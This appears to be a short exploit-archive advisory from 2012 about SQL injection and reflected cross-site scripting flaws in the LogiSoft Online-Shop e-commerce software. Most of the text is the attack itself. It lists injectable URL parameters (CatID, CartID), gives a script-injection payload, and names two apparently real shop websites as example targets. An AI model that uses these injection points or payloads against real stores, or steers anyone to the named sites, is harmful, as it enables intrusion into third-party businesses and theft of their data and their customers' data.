id: 18710
date: 06/20/2012
title: LogiSoft Online-Shop / E-Commerce-System Sql Injection/XSS Vulnerabilties
author: AtT4CKxT3rR0r1ST
cves: 

LogiSoft Online-Shop / E-Commerce-System Sql Injection/XSS Vulnerabilties
=======================================================================

#######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.logisoft.be/
#######################################################################

===[ Exploit ]===


Multiple Sql Injection
=======================
http://SITE/index.php?CatID=sql
http://SITE/index.php?CartID=sql


Example:
http://www.alltronic.be/shop/
http://php.bene.ws/shop/



Reflected XSS
==============


http://SITE/index.php?CatID='"--></style></script><script>alert(1337)</script>


####################################################################### 



#  0day.today [2023-03-27]  #